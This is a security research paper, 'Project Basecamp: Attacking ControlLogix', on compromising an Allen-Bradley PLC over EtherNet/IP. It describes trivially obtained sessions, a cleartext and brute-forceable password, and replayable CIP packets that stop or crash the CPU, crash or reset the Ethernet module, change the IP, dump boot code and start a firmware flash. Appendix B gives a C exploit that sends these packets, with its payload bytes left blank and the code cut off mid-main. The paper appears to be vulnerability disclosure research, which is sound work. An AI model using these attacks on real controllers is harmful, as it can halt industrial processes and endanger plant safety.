Project Basecamp: Attacking ControlLogix
Ruben Santamarta, www.reversemode.com

CONTENTS

1 Introduction
    Device background
2 Methodology
    Tools
    Time tracking
3 Technical details
    3.1 Network monitoring / reverse engineering Rockwell software / Logix CPU Security tool
    3.2 Exploring the CIP protocol: service codes, classes, attributes, instances
    3.3 Reverse engineering the firmware
4 Conclusions
Appendix A: References
Appendix B: Exploit

1 INTRODUCTION

As part of Project Basecamp the author was provided with an AB ControlLogix 1756 controller comprised of the following modules:

    Logix 5561 CPU, revision 16.20.08
    1756-ENBT/A module, revision 4.03.02

Device background

Extracted from http://www.ab.com/en/epub/catalogs/12762/2181376/2416247/360807/360809/tab2.html:

"The ControlLogix system provides discrete, drives, motion, process and safety control together with communication and state-of-the-art I/O. A simple ControlLogix system consists of a standalone controller and modules in a single chassis."

[Figure: ControlLogix system overview. A ControlLogix chassis connected over EtherNet/IP, ControlNet, DeviceNet and Foundation Fieldbus to field devices (PowerFlex 70 and PowerFlex 755 drives, ArmorBlock, CompactBlock and FLEX I/O, Guard I/O, servo drives and motors, valves, flowmeters) and to a plant MRP system and database.]

2 METHODOLOGY

The only possible approach is a black-box one. To help the reader understand how this research was performed, some aspects are detailed below.

Tools

    Reverse engineering:  IDA Pro, Immunity Debugger, deeze
    Network monitoring:   Microsoft Network Monitor, Wireshark, Nmap, snmpwalk, MIB Browser
    C/C++ compiler:       Visual Studio, GCC

Time tracking

45 hours approximately. [Figure: pie chart of the time spent on reverse engineering, network monitoring, information gathering, reading, programming and testing.]

Note to the reader: it is highly recommended to read at least some of the references in Appendix A. They contain most of the documents consulted during the research, so some of the concepts, terminology and technical details comprehensively explained in that documentation are assumed and will not be repeated in this report.

3 TECHNICAL DETAILS

The 1756-ENBT/A brings Ethernet connectivity to the controller, thus opening the door to a whole range of remote attack vectors. Via nmap, snmp and netstat:

    TCP 0.0.0.0:80     http (GoAhead)
    TCP 0.0.0.0:111    rpcbind
    TCP 0.0.0.0:44818  EtherNet/IP (explicit messages)
    UDP 0.0.0.0:68     dhcp (if enabled)
    UDP 0.0.0.0:111
    UDP 0.0.0.0:161    snmp
    UDP 0.0.0.0:2222   EtherNet/IP (implicit I/O)
    UDP 0.0.0.0:44818

By using snmpwalk or a MIB browser we can easily interact with the MIB-II tree supported by this device.

[Figure: MIB browser showing the iso.org.dod.internet.mgmt.mib-2.system subtree of the module: sysObjectID 1.3.6.1.4.1.95.1.12 (Rockwell Automation 1756), sysUpTime 44 minutes 56 seconds, sysDescr, sysContact, sysName, sysLocation.]

The interesting port here is 44818, which corresponds to the EtherNet/IP application protocol:

"EtherNet/IP is an application layer protocol treating devices on the network as a series of objects. EtherNet/IP is built on the Common Industrial Protocol (CIP) for access to objects from ControlNet and DeviceNet networks." (http://en.wikipedia.org/wiki/EtherNet/IP)

This port is used by the Rockwell Automation software (RSLogix, RSLinx drivers) to communicate via explicit messages with those ControlLogix controllers that have EtherNet/IP modules. EtherNet/IP encapsulates CIP explicit messages, so a valid EtherNet/IP packet is comprised of the following encapsulation header followed by a CIP packet:

    typedef struct _encap_h {
        UINT16 iEncaph_command;      /* Command code */
        UINT16 iEncaph_length;       /* Total transaction length */
        UINT32 lEncaph_session;      /* Session identifier */
        UINT32 lEncaph_status;       /* Status code */
        UINT32 alEncaph_context[2];  /* Context information */
        UINT32 lEncaph_opt;          /* Options flags */
    } ENCAP_H, *PENCAP_H;

[Figure: CIP layers mapped onto the OSI model. Application: user device profiles, CIP application layer, application object library; Presentation: CIP data management services, explicit messages and I/O messages; Session: CIP message routing and connection management; Transport: encapsulation; Network and Data Link: Ethernet (possible future alternatives: ATM, USB).]

In order to successfully send EtherNet/IP packets we need a valid session ID, which can be obtained through the Register Session command.

1. The client sends a Register Session ENIP (EtherNet/IP) packet:

    Transmission Control Protocol, Src Port: lupa (1212), Dst Port: EtherNet-IP-2 (44818)
    EtherNet/IP (Industrial Protocol), Session: 0x00000000, Register Session
        Encapsulation Header
            Command: Register Session (0x0065)
            Length: 4
            Session Handle: 0x00000000
            Status: Success (0x00000000)
            Sender Context: 0000000000000000
            Options: 0x00000000
        Command Specific Data
            Protocol Version: 1
            Option Flags: 0x0000

2. The server replies with a "randomly generated" session ID, which is in fact totally predictable:

    Transmission Control Protocol, Src Port: EtherNet-IP-2 (44818), Dst Port: lupa (1212)
    EtherNet/IP (Industrial Protocol), Session: 0x16020100, Register Session
        Encapsulation Header
            Command: Register Session (0x0065)
            Length: 4
            Session Handle: 0x16020100
            Status: Success (0x00000000)
            Sender Context: 0000000000000000
            Options: 0x00000000
        Command Specific Data
            Protocol Version: 1
            Option Flags: 0x0000

Every ENIP packet we send from now on must contain our session handle. That's all: we hacked the controller. There is no other security measure at the protocol level.

The only (but not trivial) barrier we face right now is discovering how Allen-Bradley has implemented the CIP common objects, as well as any additional vendor-specific objects. That knowledge is what we need in order to fully control the PLC. From now on our work consists in discovering what kind of vendor-specific CIP objects the 1756-ENBT/A implements and how we can use them to compromise the controller. This task can be accomplished through three main, different but complementary, methods. The following tables list the pros and cons of each one.

Network monitoring / reverse engineering Rockwell software
    Pros: easy to accomplish; you can copy and paste packets; you can mimic the main functionalities out of the box; dynamic.
    Cons: limited, since you may miss functionality only used by AB's internal tools and/or backdoors.

Exploring the CIP protocol (service codes, classes, attributes, instances)
    Pros: easy to accomplish; discovers hidden functionalities and backdoors; discovers vulnerabilities due to malformed packets (fuzzing); dynamic.
    Cons: limited, since you may miss internal developer tools, functionality and backdoors; time consuming; programming effort.

Reverse engineering the firmware
    Pros: access to the whole set of functionalities; discovers hidden functionalities and backdoors.
    Cons: it may be more difficult than the other options; time consuming; limited access to firmware files; mainly static (dynamic may also be possible).

During this research all these approaches were tested.

3.1 Network monitoring / reverse engineering Rockwell software

RSLogix, RSLinx and other Rockwell software can be easily downloaded from the Rockwell support website. By interacting with this software while monitoring the network traffic we can easily analyze and extract the packets needed to monitor and control the PLC, i.e. obtain information about the processes running on the CPU or update the firmware. The vast majority of Rockwell's software uses the proper drivers to speak with the controller according to its kind of connection, which is the right way to do so. Let's see some of the initial network flow captured between Rockwell's drivers and the EtherNet/IP module.

1. The driver tries to discover who is active on the Ethernet network by sending a List Identity broadcast message:

    User Datagram Protocol, Src Port: 50028, Dst Port: EtherNet-IP-2 (44818)
    EtherNet/IP (Industrial Protocol), Session: 0x00000000, List Identity
        Encapsulation Header
            Command: List Identity (0x0063)
            Length: 0
            Session Handle: 0x00000000
            Status: Success (0x00000000)
            Sender Context: 0000000000000000
            Options: 0x00000000

2. The 1756-ENBT/A module responds to this request:

    4  32.280805  192.168.1.44 -> 255.255.255.255  ENIP  66  List Identity (Req)

3. Then it starts to discover the kind of device that is responding to its request, which components the controller is comprised of and what type of basic functionality it has. This is done by issuing requests to different CIP objects via different service codes; in this capture we can see how the driver interrogates the Identity object (class 0x01, instance 0x01) to identify the CPU type, among other things:

    85  38.540506  192.168.1.44 -> 192.168.1.35  CIP CM  114  Unconnected Send: Get Attribute All
    86  38.541329  192.168.1.35 -> 192.168.1.44  TCP      60  EtherNet-IP-2 > lupa [ACK] Seq=1748
    87  38.543664  192.168.1.35 -> 192.168.1.44  CIP     133  Success
    88  38.549131  192.168.1.44 -> 192.168.1.35  CIP CM  122  Unconnected Send: Get Attribute List
    89  38.555904  192.168.1.35 -> 192.168.1.44  CIP     118  Success

Logix CPU Security tool

The only CPU-side security measure we found is this feature. This tool supposedly allows the operator to put the CPU in a secure state. The attacks presented in this report still work even in a secured state, so the full scope of this functionality is not clear.

[Figure: Logix CPU Security tool window. Controller Security Status: SECURED; Password Status: password exists in controller; buttons Secure Controller, Unsecure Controller, Change Password, Exit, Help.]

By sniffing the generated traffic we can discover how to change the password and how to put the CPU into a secured or unsecured state. As we can see, the password is sent in clear text; moreover, there is no limit on the number of attempts, so a brute-force attack is possible as well.

Set password: class 0x8E, service 0x51

    1  0.000000  192.168.1.44 -> 192.168.1.35  CIP CM  126  Unconnected Send: Unknown Service (0x51)
    2  0.012380  192.168.1.35 -> 192.168.1.44  CIP      98  Success

    Common Industrial Protocol
        Service: Unknown Service (0x52) (Request)
        Request Path Size: 2 (words)
        Request Path: Connection Manager, Instance: 0x01
            8-Bit Logical Class Segment (0x20), Class: Connection Manager (0x06)
            8-Bit Logical Instance Segment (0x24), Instance: 0x01
        CIP Connection Manager: Service: Unconnected Send (Request)
            Command Specific Data
                Priority/Time_tick: 0x03
                Time-out_ticks: 240 (actual time-out: 1920 ms)
                Message Request Size: 0x0011
                Message Request
                    Service: Unknown Service (0x51) (Request)
                    Request Path Size: 2 (words)
                    Request Path: Class 0x8E, Instance 0x01 (CIP Class Generic)
                    Command Specific Data: 03 00 41 42 43 04 00 41 42 43 44
                                           (old password "ABC" -> new password "ABCD")

    0040  ... 00 00 b8 15 00 00 88 65 46 02 00 00 00 00 00 00
    0050  00 00 02 00 02 00 00 00 00 00 b2 00 20 00 52 02
    0060  20 06 24 01 03 f0 11 00 51 02 20 8e 24 01 03 00
    0070  41 42 43 04 00 41 42 43 44 00 01 00 01 00

Unsecure CPU: class 0x8E, service 0x53

    1  0.000000  192.168.1.44 -> 192.168.1.35  CIP CM  120  Unconnected Send: Unknown Service (0x53)
    2  0.012087  192.168.1.35 -> 192.168.1.44  CIP      98  Success

    Message Request Size: 0x000C
    Message Request
        Service: Unknown Service (0x53) (Request)
        Request Path Size: 2 (words)
        Request Path: Class 0x8E, Instance 0x01
        Command Specific Data: 04 00 41 42 43 44   (password "ABCD")

    0050  00 00 02 00 02 00 00 00 00 00 b2 00 1a 00 52 02
    0060  20 06 24 01 03 f0 0c 00 53 02 20 8e 24 01 04 00
    0070  41 42 43 44 01 00 01 00

Replay attacks are totally possible in this scenario (and in general): since the encapsulated CIP packet does not vary, we only need a valid session ID, which can be obtained without problems. That is one of the ideas we want to show in this section: interact with the software while monitoring the network, then analyze the traffic.

Let's see another one: reverse engineering the software to extract functionality. This tool (BootpServer.exe) is slightly different. It is used to configure the 1756-ENBT/A module (or any other similar module) in a more direct way, without using the drivers. By forging its own encapsulated CIP packets, this Rockwell tool can enable or disable some of the IT functionality the common TCP/IP CIP object implements.

[Figure: Rockwell BOOTP/DHCP Server window listing request entries (hr:min:sec, type, Ethernet (MAC) address, IP address, hostname) with Add to Relation List and Clear History buttons.]

BootpServer.exe, sub_40934C:

    .text:0040946E loc_40946E:                        ; CODE XREF: sub_40934C+C3
    .text:00409477  mov  [ebp+var_70], ecx
    .text:0040947A  mov  edx, [ebp+var_70]            ; crafting ENIP header
    .text:0040947D  mov  word ptr [edx], 65h          ; RegisterSession command
    .text:00409482  mov  eax, [ebp+var_54]
    ...
    .text:004094D5  mov  eax, [ebp+var_4C]
    .text:004094D8  mov  word ptr [eax], 1            ; protocol version
    .text:004094DD  mov  ecx, [ebp+var_4C]

Once a valid session ID has been obtained, it uses Send RR Data to issue CIP requests:

    .text:0040959F  mov  edx, [ebp+var_70]            ; crafting ENIP header
    .text:004095A2  mov  word ptr [edx], 6Fh          ; Send RR Data command
    .text:004095A7  mov  eax, [ebp+var_38]
    .text:004095AA  and  eax, 0FFFFh
    ...
    .text:0040965B  mov  word ptr [edx], 0B2h         ; unconnected data item
    .text:00409660  mov  eax, [ebp+var_88]
    .text:00409666  mov  word ptr [eax+2], 8
    ...
    .text:004096A6  mov  edx, [ebp+var_20]
    .text:004096A9  mov  byte ptr [edx+1], 0F5h       ; class 0xF5, TCP/IP CIP object
    .text:004096AD  mov  eax, [ebp+var_20]
    .text:004096B0  mov  byte ptr [eax+2], 24h        ; instance segment
    .text:004096B4  mov  ecx, [ebp+var_20]
    .text:004096B7  mov  byte ptr [ecx+3], 1
    .text:004096BB  mov  edx, [ebp+var_20]
    .text:004096BE  mov  byte ptr [edx+4], 30h        ; attribute segment
    .text:004096C2  mov  eax, [ebp+var_20]
    .text:004096C5  mov  byte ptr [eax+5], 3          ; attribute 3, Configuration Control

If we continue analyzing the routine sub_40934C we will see how the different packets that enable and disable the BOOTP/DHCP capabilities are forged. We have also seen how this tool initializes the connection by requesting a session ID, just like the drivers do.

Attack 1: change the IP

We can extend the capabilities of this software. Attribute 0x5 (Interface Configuration) of the TCP/IP CIP object allows us to set the following fields: IP address, network mask, gateway address, name server, name server 2 and domain name. Thus we just need a packet to modify this interface. This may lead to some immediate scenarios such as DoS (due to invalid data) or MITM attacks.

    Service 0x10 (Set_Attribute_Single), class 0xF5 (TCP/IP object), attribute 0x5 (Interface Configuration)

    unsigned char packetSetIP[] = ...;   /* byte array not legible in this copy; the data carries the IP address, the network mask, the gateway, the name servers and the domain name */

This attack (functionality turned evil) works even if the controller has been secured by the Logix CPU Security tool.

3.2 Exploring the CIP protocol: service codes, classes, attributes, instances

This task involves the creation of a simple or complex tool intended to explore all the possible combinations of service codes, classes, attributes and instances supported by the common CIP objects as well as by the vendor-specific CIP objects. It is basically a brute-force approach. Some attacks obtained as a result of this approach:

Attack 2: forcing a CPU stop
    Impact: stops the CPU, leaving it in a major recoverable fault state. In order to clear the fault the key needs to be turned manually from RUN to PROG twice.
    CIP Unconnected Send (CM via 0x52), service 0x07 (STOP), class 0x64.
    unsigned char packetCPUStop[] = ...;   /* not legible in this copy */

Attack 3: crash the CPU
    Impact: crashes the CPU due to a malformed request, leaving it in a major recoverable fault state. In order to clear the fault the key needs to be turned manually from RUN to PROG twice.
    CIP Unconnected Send (CM via 0x52), service 0x0A (Multiple Service Packet), class 0x02 (Message Router).
    unsigned char packetCrashCPU[] = ...;   /* not legible in this copy */

Attack 4: dump the 1756-ENBT module's boot code
    Impact: a curious undocumented service that allows remotely dumping the EtherNet/IP module's boot code.
    CIP Unconnected Send, service 0x97 (class not legible in this copy).
    unsigned char packetDump[] = ...;   /* not legible in this copy */

Attack 5: reset the 1756-ENBT module
    Impact: resets the EtherNet/IP module.
    CIP Unconnected Send, service 0x05 (Reset), class 0x01 (Identity object).
    unsigned char packetResetEth[] = ...;   /* not legible in this copy */

Attack 6: crash the 1756-ENBT module
    Impact: crashes the module due to a vulnerability in the CIP stack (ci_ParseSegment function), so other packets can also trigger this flaw.
    CIP Unconnected Send, service 0x0E (Get_Attribute_Single), class 0xF5 (TCP/IP object). Others may be possible.
    unsigned char packetCrashEth[] = ...;   /* not legible in this copy */

Crash display:

    Fatal Log Event
    Status: 0x303  iParameter: 0x3e  pParameter: 0x9d2770
    Source: MasterLib/ci_util.c:1040
    Task Information
      NAME         TID   SIZE  CUR   HIGH  MARGIN
      EI_ObjectTask ...  5112  208   1840  3272
    Registers: r0-r28 = 0x00000000 (except r1 = 0x003?0048), r29 = 0xffffffff, r30 = 0x00009032,
               r31 = 0x009b65e0, msr = 0x00009032, lr = 0x00000000, ctr = 0x00000000,
               pc = 0x0028d3b0, cr = 0x20000000, xer = 0x00000000, dar = 0x00000000, dsisr = 0x00000000
    Call Stack (caller, func):
      0x297a94  vxTaskEntry
      0x129ae?  EI_ObjectTask
      0x129b98  EI_ObjectTask
      0x12?974  ei_ProcessInstanceRequest
      ...       ei_ProcessInstanceRequest
      ...       ei_ProcessGetAttrSingleInstance
      0x12a54c  ei_ProcessGetAttrSingleInstance
      0x120f24  ci_ParseSegment
      0x12123c  ci_ParseSegment
      0x13c7c4  gs_LogEvent
      0x13c970  gs_LogEvent
      0x108470  GS_LogAppEventData
      0x108480  GS_LogAppEventData
      0x144024  LogCrashEventData
      0x144110  LogCrashEventData
      0x2903c0  taskSpawn
      0x290438  taskSpawn
      0x290b44  taskActivate
      ...       taskActivate
      0x2916b8  taskResume

Attack 7: flash update
    Impact: initializes the device to update the firmware.
    CIP Unconnected Send, service 0x4B (NV_UPDATE, vendor-specific name extracted from the firmware), class 0xA1 (Non-Volatile object, vendor-specific name extracted from the firmware). After issuing this service we would load our own firmware via service code 0x4D (NV_TRANSFER).
    unsigned char packetFlashUp[] = ...;   /* not legible in this copy */

    49  72.393044  192.168.1.38 -> 192.168.1.33  CIP  110  Success
    ...
    54  72.418060  192.168.1.38 -> 192.168.1.33  CIP  454  Unknown Service (0x4d)
    55  72.420289  192.168.1.33 -> 192.168.1.38  CIP  104  Success
    56  72.422328  192.168.1.38 -> 192.168.1.33  CIP  454  Unknown Service (0x4d)
    57  72.424555  192.168.1.33 -> 192.168.1.38  CIP  104  Success
    58  72.426660  192.168.1.38 -> 192.168.1.33  CIP  454  Unknown Service (0x4d)
    59  72.428971  192.168.1.33 -> 192.168.1.38  CIP  104  Success
    60  72.432678  192.168.1.38 -> 192.168.1.33  CIP  454  Unknown Service (0x4d)
    61  72.435043  192.168.1.33 -> 192.168.1.38  CIP  104  Success
    62  72.437043  192.168.1.38 -> 192.168.1.33  CIP  454  Unknown Service (0x4d)
    63  72.439267  192.168.1.33 -> 192.168.1.38  CIP  104  Success

    Updating the firmware via NV_UPDATE and NV_TRANSFER (see section 3.3 for more information).

All these attacks were developed by exploring the CIP protocol capabilities in a semi-automated manner, using valid CIP packets as templates. Later on, additional information such as vendor-specific object and service names was extracted by reversing the firmware.

Note that the packets presented are only the CIP packet; you need to encapsulate them as we have seen before. To sum up:

1. Obtain a valid session ID via the Register Session EtherNet/IP command.
2. Forge an EtherNet/IP header with this session ID and the Send RR Data command (0x6F).
3. Prepend this header to the malicious packet before sending it.

See Appendix B (exploit.c) for more information.

Attacks successfully tested against: 1756-ENBT/A rev. 4.0X, Logix 5561 rev. 16.20.08.

3.3 Reverse engineering the firmware

Previous work (see the first reference in Appendix A) has been done on this matter, so we will only explain how the firmware can be reconstructed and used to discover vendor-specific objects.

Reconstructing the firmware

Once extracted from the .wbn file (i.e. using Matasano's deeze) we load it in IDA and perform the following steps:

1. Select the PowerPC processor.
2. Rebase to 0x100000.
3. Run this publicly available script to discover additional functions if IDA Pro fails to do so.
4. Reconstruct the VxWorks symbol table:
   a. Find the cross-references to the string "\nAdding %ld symbols for standalone.\n".
   b. Locate the symbol table by finding these instructions in the routine that references the string above:

        ROM:001022B4  lis  r28, 0x34
        ROM:001022B8  lis  r30, dword_309630@h   ; end address
        ROM:001022BC  lis  r26, 0x34
        ROM:001022C0  lis  r27, dword_2F3F80@h
        ROM:001022C4  bge  loc_1022F0
        ROM:001022C8  lis  r9, dword_2F5840@h    ; start address

   c. Edit this script, http://www.reversemode.com/images/stories/schneider_files/vxworks_symtable.idc, adjusting eaStart to 0x2F5840 and eaEnd to 0x309630, and run it.

Discovering vendor-specific objects

By reverse engineering this function we can discover the class ID of the vendor-specific objects. ab_Init (ROM:00119600) calls the initialization routine of every object in turn, bailing out to loc_11977C as soon as one of them fails:

    ROM:00119600 ab_Init:                              ; CODE XREF: AB_Init+10p, AB_Init+34p
    ROM:00119600  stwu  sp, -0x10(sp)
    ROM:00119604  mflr  r0
    ROM:00119608  stw   r31, 0x10+var_4(sp)
    ROM:0011960C  stw   r0, 0x10+arg_4(sp)
    ROM:00119610  mr    r31, r3
    ROM:00119614  bl    GS_Init
    ROM:00119618  mr.   r3, r3
    ROM:0011961C  bne   loc_11977C
    ROM:00119620  mr    r3, r31
    ROM:00119624  bl    EN_CD_Init
    ROM:00119628  mr.   r3, r3
    ROM:0011962C  bne   loc_11977C
    ...                                                ; the same pattern repeats for:
                  EN_Init, CD_Init, MA_CD_Init, CM_Init, ID_Init, MR_Init, UM_Init,
                  MA_UM_Init, BR_Init, ..., DB_Init (ROM:001196C4), ICP_Init, ED_Init,
                  ET_Init, EI_Init, EL_Init, EM_Init, NV_Init (ROM:00119734), RA_Init,
                  ACMI_Init
    ROM:00119764  bl    FIU_Init
    ROM:00119768  srawi r9, r3, 0x1F
    ROM:0011976C  xor   r0, r9, r3
    ROM:00119770  subf  r0, r0, r9
    ROM:00119774  srawi r0, r0, 1
    ROM:00119778  and   r3, r3, r0
    ROM:0011977C loc_11977C:                           ; CODE XREF: ab_Init+1Cj, ab_Init+2Cj, ...
    ROM:0011977C  lwz   r0, 0x10+arg_4(sp)
    ROM:00119780  mtlr  r0
    ROM:00119784  lwz   r31, 0x10+var_4(sp)
    ROM:00119788  addi  sp, sp, 0x10
    ROM:0011978C  blr
    ROM:0011978C ; End of function ab_Init

All the Init functions initialize objects. To get the class ID we have to find these instructions right before a call to GS_PutMsgQueue, where XX is the class ID:

    li   r9, 0xXX
    sth  r9, 0x14(r4)

Let's see an example: NV_Init. Assuming NV stands for Non-Volatile, it is a vendor-specific object implemented to handle the firmware upgrade process. Services implemented:

    0x4B  NV_Update   (see Attack 7 above)
    0x4D  NV_Transfer

    ROM:00141A44  stw   r0, 4(r4)
    ROM:00141A48  li    r9, 0xA1          ; matches our Attack 7 class ID
    ROM:00141A4C  sth   r9, 0x14(r4)
    ROM:00141A50  li    r11, 1
    ROM:00141A54  sth   r11, 0x16(r4)
    ROM:00141A58  lis   r9, 0x33
    ...
    ROM:00141A70  bl    GS_PutMsgQueue

If we want to analyze how a specific object is implemented we should locate its associated object task, i.e. in NV_Init:

    ROM:001419E0  lis   r9, nv_ObjectTask@h
    ROM:001419E4  lis   r11, unk_29DC40@h
    ROM:001419E8  addi  r9, r9, nv_ObjectTask@l
    ROM:001419EC  li    r8, 0
    ROM:001419F0  addi  r11, r11, unk_29DC40@l
    ROM:001419F4  li    r0, 0x1800
    ROM:001419F8  li    r10, 0x3D
    ROM:001419FC  stw   r9, 0x40+var_30(sp)
    ...
    ROM:00141A10  stw   r8, 0x40+var_2C(sp)
    ROM:00141A14  addi  r3, sp, 0x40+var_30
    ROM:00141A18  bl    GS_NewTask

The task loops taking messages from its queue and dispatches instance requests and class requests to separate handlers:

    ROM:00142BB8 nv_ObjectTask:                        ; DATA XREF: NV_Init+500, NV_Init+580
    ROM:00142BB8  stwu  sp, -0x10(sp)
    ROM:00142BBC  mflr  r0
    ROM:00142BC0  stw   r30, 0x10+var_8(sp)
    ROM:00142BC4  stw   r31, 0x10+var_4(sp)
    ROM:00142BC8  stw   r0, 0x10+arg_4(sp)
    ROM:00142BCC  lis   r30, 0x33
    ROM:00142BD0  lis   r31, aMasterlibNvObj@h     ; "MasterLib/nv_obj.c"
    ROM:00142BD4 loc_142BD4:                         ; CODE XREF: nv_ObjectTask+54j, nv_ObjectTask+60j
    ROM:00142BD4  lwz   r3, 0x1EA4(r30)
    ROM:00142BD8  bl    GS_TakeMsgQueue
    ROM:00142BDC  mr    r5, r3
    ROM:00142BE0  lwz   r0, 4(r5)
    ROM:00142BE4  cmpwi r0, 0x51
    ROM:00142BE8  beq   loc_142BF8
    ROM:00142BEC  cmpwi r0, 0x84
    ROM:00142BF0  beq   loc_142C1C
    ROM:00142BF4  b     loc_142C50
    ROM:00142BF8 loc_142BF8:                         ; CODE XREF: nv_ObjectTask+30j
    ROM:00142BF8  lhz   r0, 0x1A(r5)
    ROM:00142BFC  cmpwi r0, 0
    ROM:00142C00  beq   loc_142C10
    ROM:00142C04  mr    r3, r5
    ROM:00142C08  bl    nv_ProcessInstanceRequest
    ROM:00142C0C  b     loc_142BD4
    ROM:00142C10 loc_142C10:                         ; CODE XREF: nv_ObjectTask+48j
    ROM:00142C10  mr    r3, r5
    ROM:00142C14  bl    nv_ProcessClassRequest
    ROM:00142C18  b     loc_142BD4

    ROM:00141C3C nv_ProcessInstanceRequest:
    ...
    ROM:00141C84 loc_141C84:
    ROM:00141C84  cmpwi r4, 0x4B                     ; NV_Update service code
    ROM:00141C88  beq   loc_141CC8
    ROM:00141C8C  bgt   loc_141C84
    ROM:00141C90  cmpwi r4, 1
    ROM:00141C94  beq   loc_141C90
    ROM:00141C98  b     loc_141DD0
    ...                                                ; CODE XREF: nv_ProcessInstanceRequest+38j
    ROM:00141CA0  cmpwi r4, 0x4D                     ; NV_Transfer service code
    ROM:00141CA4  beq   loc_141D4C
    ...
    ROM:00141DD0 loc_141DD0:

4 CONCLUSIONS

One of the most time-consuming tasks I came across during this research was reading all the technical documentation gathered. Initially this may sound strange, but it is nothing unusual when researching industrial devices, which commonly suffer from a lack of strong security measures implemented by design: the hardest part is not learning how to break things but understanding how they really work.

Therefore the key point behind attacking this PLC was not how to circumvent its security but monitoring how the legitimate software performs valid operations in order to mimic them, in addition to the usual dose of reverse engineering and fuzzing to discover the secrets behind the scenes. To sum up, any legitimate functionality supported by the controller could also be used by a malicious user in a malicious manner.

During this journey we have identified problems that can be used to cause a DoS, load a trojanized firmware or leak information. Actually, it's not a bug, it's a feature.

APPENDIX A: REFERENCES

Leveraging Ethernet Card Vulnerabilities in Field Devices
    http://www.digitalbond.com/wp-content/uploads/2011/05/1-PLC-final.pdf
Developer How-To Guides
    http://www.rockwellautomation.com/enabled/guides.html
Interfacing the ControlLogix PLC over EtherNet/IP
    http://arxiv.org/ftp/cs/papers/0110/0110065.pdf
CIP User Manual & Installation Guide
    http://www.n-tron.com/pdf/cip_usermanual.pdf
The CIP Networks Library
    http://www.odva.org/Home/CIPNETWORKSPECIFICATIONS/HowOrganizedPublished/tabid/79/lng/en-US/language/en-US/Default.aspx
EtherNet/IP Library
    http://www.odva.org/Home/ODVATECHNOLOGIES/EtherNetIP/EtherNetIPLibrary/tabid/76/lng/en-US/language/en-US/Default.aspx
The Common Industrial Protocol (CIP) and the Family of CIP Networks; EtherNet/IP (Industrial Protocol)
    http://www.odva.org/Portals/0/Library/Publications_Numbered/PUB00123R0_Common-Industrial_Protocol_and_Family_of_CIP_Netw.pdf
http://www.technologyuk.net/telecommunications/industrial_networks/cip.shtml
http://www.rockwellautomation.com/industries/water/get/enetip.pdf
http://en.wikipedia.org/wiki/EtherNet/IP
http://sourceforge.net/projects/opener

APPENDIX B: EXPLOIT

Project Basecamp: Attacking ControlLogix. "Deep fried controller" exploit. The byte values of the packet arrays are not legible in this copy of the paper; the arrays below are left empty and must be filled with the CIP packets described in section 3.2.

    /* Project Basecamp - Attacking ControlLogix
       Deep fried controller - exploit for the attacks presented in the paper */
    #include <winsock2.h>
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <stdbool.h>
    #pragma comment(lib, "wsock32.lib")

    #define ENBT_PORT                 44818
    #define ENCAP_CMD_REGISTERSESSION 101   /* 0x65: Register Session */
    #define ENCAP_CMD_SEND_RRDATA     111   /* 0x6F: Send Request/Reply Data */

    typedef unsigned char  UINT8;
    typedef unsigned short UINT16;
    typedef unsigned int   UINT32;

    typedef struct _encap_h {
        UINT16 iEncaph_command;      /* Command code */
        UINT16 iEncaph_length;       /* Total transaction length */
        UINT32 lEncaph_session;      /* Session identifier */
        UINT32 lEncaph_status;       /* Status code */
        UINT32 alEncaph_context[2];  /* Context information */
        UINT32 lEncaph_opt;          /* Options flags */
    } ENCAP_H, *PENCAP_H;

    typedef struct _req_session {
        ENCAP_H req_Common;
        UINT16  req_Proto;
        UINT16  req_Flags;
    } REQ_SESSION, *PREQ_SESSION;

    UINT32 g_SessionId;

    bool forgePacket(unsigned char *packet, UINT32 len, UINT32 commID, SOCKET client);

    /* Attacks presented in the paper (CIP packets only, see section 3.2).
       Byte values not legible in this copy. */
    unsigned char packetCPUStop[]  = "";  /* Attack 2: STOP, class 0x64 */
    unsigned char packetCrashCPU[] = "";  /* Attack 3: Multiple Service Packet, Message Router */
    unsigned char packetCrashEth[] = "";  /* Attack 6: Get_Attribute_Single, class 0xF5 */
    unsigned char packetDump[]     = "";  /* Attack 4: service 0x97 */
    unsigned char packetResetEth[] = "";  /* Attack 5: Reset, Identity object */
    unsigned char packetFlashUp[]  = "";  /* Attack 7: NV_UPDATE, class 0xA1 */

    /* Prepend an encapsulation header carrying our session ID and send the packet */
    bool forgePacket(unsigned char *packet, UINT32 len, UINT32 commID, SOCKET client)
    {
        PENCAP_H pHeader = (PENCAP_H)calloc(1, sizeof(ENCAP_H));
        void *pReq = calloc(0x200, 1);

        pHeader->iEncaph_command = (UINT16)commID;
        pHeader->iEncaph_length  = (UINT16)len;
        pHeader->lEncaph_session = g_SessionId;

        memcpy(pReq, pHeader, sizeof(ENCAP_H));
        memcpy((UINT8 *)pReq + sizeof(ENCAP_H), packet, len);

        printf("[+] Sending malicious packet...\n");
        send(client, (const char *)pReq, len + sizeof(ENCAP_H), 0);
        recv(client, (char *)pReq, 0x10, 0);
        return true;
    }

    int main(int argc, char *argv[])
    {
        WSADATA ws;
        SOCKET enbt_socket;
        struct sockaddr_in peer;
        PREQ_SESSION pSession;
        void *pReply;

        if (argc < 2) {
            printf("\nusage: exploit.exe <ip>\n");
            exit(0);
        }

        WSAStartup(0x0202, &ws);
        peer.sin_family      = AF_INET;
        peer.sin_port        = htons(ENBT_PORT);
        peer.sin_addr.s_addr = inet_addr(argv[1]);
        enbt_socket = socket(AF_INET, SOCK_STREAM, 0);

        pSession = (PREQ_SESSION)calloc(1, sizeof(REQ_SESSION));
        pReply   = calloc(0x200, 1);

        /* Getting SessionID */
        pSession->req_Common.alEncaph_context[0] = 0;
        pSession->req_Common.alEncaph_context[1] = 0;
        pSession->req_Common.iEncaph_command     = ENCAP_CMD_REGISTERSESSION;
        pSession->req_Common.iEncaph_length      = sizeof(UINT32);
        pSession->req_Common.lEncaph_opt         = 0;
        pSession->req_Common.lEncaph_session     = 0;
        pSession->req_Common.lEncaph_status      = 0;
        pSession->req_Proto = 0x1;
        pSession->req_Flags = 0;

        if (connect(enbt_socket, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))) {
            printf("\nController unreachable\n");
            exit(0);
        }
        send(enbt_socket, (const char *)pSession, sizeof(REQ_SESSION), 0);
        recv(enbt_socket, (char *)pReply, 28, 0);
        g_SessionId = *((UINT32 *)pReply + 1);      /* session handle at offset 4 of the reply */
        printf("\n[+] Received session handle: %x\n", g_SessionId);

        /* Deep fried controller: DoS'ing the CPU and the EtherNet/IP module */
        forgePacket(packetCPUStop,  sizeof(packetCPUStop)  - 1, ENCAP_CMD_SEND_RRDATA, enbt_socket);
